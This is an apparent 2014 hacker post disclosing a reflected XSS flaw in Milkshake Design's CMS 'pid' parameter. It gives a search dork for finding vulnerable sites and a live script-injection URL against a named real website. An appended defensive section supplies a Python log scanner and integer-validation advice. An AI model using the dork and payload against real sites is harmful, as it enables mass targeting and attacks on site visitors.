Thursday, 3 July 2014

milkshakedesign CMS - XSS Vulnerability

Dork:
intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:
programmeview.php?pid=

Example & Live Demo:
http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E
NEXUS
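
For site operators, a log check for requests that put markup into `pid` (an added example, not part of the original post). It assumes a combined-format access log and that legitimate `pid` values are plain integers, as the `310` in the demo URL suggests; the sample log lines, IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jul/2014:10:01:22 +0000] "GET /programmeview.php?pid=310 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jul/2014:10:02:05 +0000] "GET /programmeview.php?pid=310%22%3E%3Cb%3Etest%3C/b%3E HTTP/1.1" 200 5188 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jul/2014:10:02:40 +0000] "GET /programmeview.php?pid=310%2522%253E HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Jul/2014:10:03:11 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
NUMERIC_PID = re.compile(r"[0-9]+")  # assumption: valid pid values are ASCII integers


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is seen in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_pid_requests(log_text):
    """Return (client_ip, decoded_pid) for programmeview.php requests with a non-numeric pid."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/programmeview.php"):
            continue
        # parse_qs decodes once; keep_blank_values so an empty pid is inspected too
        for raw in parse_qs(parts.query, keep_blank_values=True).get("pid", []):
            pid = fully_decode(raw)
            if not NUMERIC_PID.fullmatch(pid):
                hits.append((ip, pid))
    return hits


if __name__ == "__main__":
    for ip, pid in suspicious_pid_requests(SAMPLE_LOG):
        print(f"{ip}\tpid={pid!r}")
```

The same integer-only rule belongs in the page itself: reject or cast `pid` before it is used, and HTML-encode it wherever it is written into the response.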